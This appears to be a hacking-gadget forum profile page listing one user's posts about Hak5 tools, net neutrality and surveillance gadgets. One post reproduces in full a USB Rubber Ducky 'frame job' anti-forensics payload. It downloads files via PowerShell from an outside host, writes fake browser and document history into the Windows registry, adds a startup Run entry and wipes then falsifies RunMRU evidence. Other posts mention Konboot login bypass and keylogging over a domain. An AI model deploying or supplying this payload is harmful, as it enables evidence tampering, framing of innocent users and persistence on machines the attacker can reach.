br0k3nilluzion

Active Members • Posts: 67 • Days Won: 1

Everything posted by br0k3nilluzion

  1. I'm interested in how you would do it as well, Jermain69.. Here is a way that has been done and is tested to work for Kali on Nexus 7 (2012) http://w11.zetaboards.com/Pwnie_Express/topic/9605021/1/
  2. Found this while studying. Interesting.. Hope you guys like it. http://www.informationwarfarecenter.com/Cyber-Secrets.html http://www.informationwarfarecenter.com/files/rubber-ducky-frame-job.txt

     REM Calling this the rubber ducky frame job. This adds fake information into Windows Registry areas forensic
     REM analysts use to track internet usage.
     REM Author: Jeremy Martin - jeremy@informationwarfarecenter.com
     REM Class: Anti Forensics
     REM version 0.1.3
     DELAY 1000
     GUI r
     DELAY 1000
     REM Download a file and save it into the temp folder
     STRING powershell (new-object System.Net.WebClient).DownloadFile('http://www.informationwarfarecenter.com/CIR/CIR.pdf','%TEMP%\latest-CIR.pdf')
     ENTER
     DELAY 1000
     GUI r
     DELAY 1000
     REM Download a graphic and save it to temp
     STRING powershell (new-object System.Net.WebClient).DownloadFile('http://www.informationwarfarecenter.com/back.jpg','%TEMP%\back.jpg')
     ENTER
     DELAY 1000
     GUI r
     DELAY 1000
     REM Open Internet Explorer and generate traffic
     STRING iexplore.exe http://www.informationwarfarecenter.com/index-4.html
     DELAY 1000
     ENTER
     DELAY 1000
     GUI r
     DELAY 1000
     REM Fake Internet Explorer history
     STRING REG ADD "HKCU\SOFTWARE\Microsoft\Internet Explorer\TypedURLs" /v url1 /d http://www.informationwarfarecenter.com/files/rubber-ducky-frame-job.txt /f
     DELAY 1000
     ENTER
     DELAY 1000
     GUI r
     DELAY 1000
     REM Fake Internet Explorer history
     STRING REG ADD "HKCU\SOFTWARE\Microsoft\Internet Explorer\TypedURLs" /v url2 /d http://www.i-never-went-here.com /f
     DELAY 1000
     ENTER
     DELAY 1000
     GUI r
     DELAY 1000
     REM Fake Internet Explorer history
     STRING REG ADD "HKCU\SOFTWARE\Microsoft\Internet Explorer\TypedURLs" /v url3 /d http://www.i-never-went-here-again.com /f
     DELAY 1000
     ENTER
     DELAY 1000
     GUI r
     DELAY 1000
     REM Fake Internet Explorer history
     STRING REG ADD "HKCU\SOFTWARE\Microsoft\Internet Explorer\TypedURLs" /v url4 /d http://www.i-just-faked-the-url-address.com /f
     DELAY 1000
     ENTER
     DELAY 1000
     GUI r
     DELAY 1000
     REM Fake Internet Explorer history
     STRING REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\TypedPaths" /v url1 /d C:\i-just-faked-the-folder /f
     DELAY 1000
     ENTER
     DELAY 1000
     GUI r
     DELAY 1000
     REM Fake Document History
     STRING REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs" /v 0 /d fake-data /f
     DELAY 1000
     ENTER
     DELAY 1000
     GUI r
     DELAY 1000
     REM Add a startup link for a previously downloaded file. Malware uses this quite often.
     STRING REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v fakefile /d "%TEMP%\latest-CIR.pdf" /f
     DELAY 1000
     ENTER
     DELAY 1000
     GUI r
     DELAY 1000
     REM Changes the background to the previously downloaded graphic
     STRING REG ADD "HKCU\Control Panel\Desktop" /v Wallpaper /d %TEMP%\back.jpg /f
     DELAY 1000
     ENTER
     DELAY 1000
     GUI r
     DELAY 1000
     REM Opens a previously downloaded file
     STRING powershell Start-Process "%TEMP%\latest-CIR.pdf"
     ENTER
     DELAY 1500
     GUI r
     DELAY 1000
     REM Removes evidence of previous entries
     STRING REG DELETE "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" /va /f
     DELAY 1000
     ENTER
     DELAY 1000
     GUI r
     DELAY 1000
     REM Add another fake evidence entry
     STRING REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" /v a /d "iexplore www.informationwarfarecenter.com/files/BGIU.zip" /f
     DELAY 1000
     ENTER
     DELAY 1000
     GUI r
     DELAY 1000
     REM Opens a previously downloaded graphic
     STRING %TEMP%/back.jpg
     DELAY 1000
     ENTER
     DELAY 1000
  3. Don't delete your post!! Hook it up with the rubber ducky. They have the pineapple rdy for u to improve upon. Now you have the rest of your concoction to clean up and make. Lookin forward to seeing how you do it.. Good luck man....
  4. The RavPower is awesome!! I have one of these as well. Plan on using it with the USB rubber ducky.. You could do so much with this baby, it's crazy! +1 for the RavPower
  5. You could use something like Konboot.. even the free one should work if it's Windows 7 and under...;p
  6. Lol, who doesn't know about L0pht.. That was back in the day with Red Boxes and gold boxes.. BBSes were the thing too..lmao. Talk about bringing up old memories! I absolutely agree with you here! We definitely need more people that are in the Industry as voices.
  7. I really do hope Hak5 will stay around in one form or another if the hammer falls their way. Hak5 IS MORE THAN A SHOW. Where else will you get some cool kats like this. Promote intelligent thought, learning new and sometimes difficult things, bring a sense of humor, bring together people to drink some das boots.. and have some freakin fun!! I agree with you digip !! This is just a major play they are making for control over something that they don't really understand. You gotta admit it is a big fulcrum though. More than just a diversionary tactic. It's a major pivot point in total control. What better way to mask what they do on any size scale, global to local...
  8. With the decision of Net Neutrality hanging in the balance, what is Hak5 (Darren, Snubs....etc) doing to ensure they still exist if it goes bad? Don't you think that the Modding sector, security sector, all things going against the grain, bringing infosec to the masses, will be controlled and shut down? Why would the public need to know things that could potentially harm big business.. for an ignorant mass of people will make them more money than an intelligent group of individuals, no matter how few.. Just a question and an opinion. What are your thoughts?
  9. https://github.com/lukesampson/scoop

     Quote from page:

     What does Scoop do?

     Scoop installs programs from the command line with a minimal amount of friction. It tries to eliminate things like:

       • Permission popup windows
       • GUI wizard-style installers
       • Path pollution from installing lots of programs
       • Unexpected side-effects from installing and uninstalling programs
       • The need to find and install dependencies
       • The need to perform extra setup steps to get a working program

     Scoop is very scriptable, so you can run repeatable setups to get your environment just the way you like, e.g.:

       scoop install sudo
       sudo scoop install 7zip git openssh --global
       scoop install curl grep sed less tail touch
       scoop install python ruby go perl

     If you've built software that you'd like others to use, Scoop is an alternative to building an installer (e.g. MSI or InnoSetup)—you just need to zip your program and provide a JSON manifest that describes how to install it.

     Thought this might help some of you Ducky warriors out there.
  10. Sweet. Ducky competition!! Nothing breeds innovation and for products to get better than some healthy competition.. It's a Duck war..Quack attack vs. the Solid Cloud.. It looks like they may have spent some more time on automating programs or scripts to run.. wonder if it'll bypass AV like the ducky can with its scripting. Hmm, theirs seems more noobish or script kiddie-ish. I say Ducks unite and quack attack this motha in a showdown..!!!
  11. Man, if you can add this to the Rubber Ducky.. you could modify it to be able to change the scripts on the fly.. have a base system, change it on the fly.. all from the convenience of a phone or tablet on hand..!!!!!!!
  12. It's the one you would see on the hak5.org site
  13. Wonder what would happen to CyanogenMod if they really did go all out on an encrypted and all for the user, screw the NSA and government ROM... Sweet dream that would be. Think they would have to give up their source code and algorithms?
  14. Why the heck are you sharing the "C" drive? I take it that that's the main partition.. Dude you're crazy. That's like saying, "Here, explore my share" to the world around you... do Group Policy control and play around with some firewall settings, set limits and give them non-Admin accounts on their computers.. There are like a million ways to implement this.. But for fun, try the implementation from Mubix...
  15. Watch his latest Hak5 video, it tells you how to keylog over the domain
  16. lol. I'm thinking not a weaponized one for Hak5.. more of the subtle type.. Webcam, pineapple, ubertooth 1, alpha 036nha, etc... Hak5 Sleuth Coin. And with a homemade mod of the femtocell for shits n grins
  17. It could be the Sleuth squad.. straight Hak5 style. Hmmm, or Digital Ninja clan..
  18. lmao.. Yes I understand. But most of the tools here can be used for nefarious means. I wasn't referring to that though. ;) Who wouldn't want that James Bond coin.. With enough toys Hak5 is so James Bond-ish.
  19. http://www.bug-transmitter.com/ Saw this and saw the Hak5 coin.. thought, wouldn't it be pretty neat to have a Hak5 coin that you could place on the counter, turn on the app on your Android phone, and you have a conversation recording and playing away on your phone.. This link below is the device being used. Super Simple !! What do you think Darren? Is this a feasible idea? I know I would love it !!!
  20. I know right!!!! This is like the James Bond vehicle for the pineapple.. There is already the Screaming Pineapple, which covers lots of ground via air.. but what if you need to get in on the ground and maybe get up on a roof or outside staircase.. hmmmm, dare I say the pineapple batmobile??? hahaha, Pineapple Express.. that would be the name of it !!!!
  21. these guys got it to be silent and they use it in an extremely sensitive environment.. http://hackaday.com/2013/02/05/military-steals-idea-of-anyone-who-ever-tied-a-cellphone-camera-to-quadcopter/
  22. Add this to the toolset for the Rubber Ducky.. and you now have a pocket full of everything you need. Too bad there wasn't a microSD one of these.. you could change the Rubber Ducky scripts on the fly...!!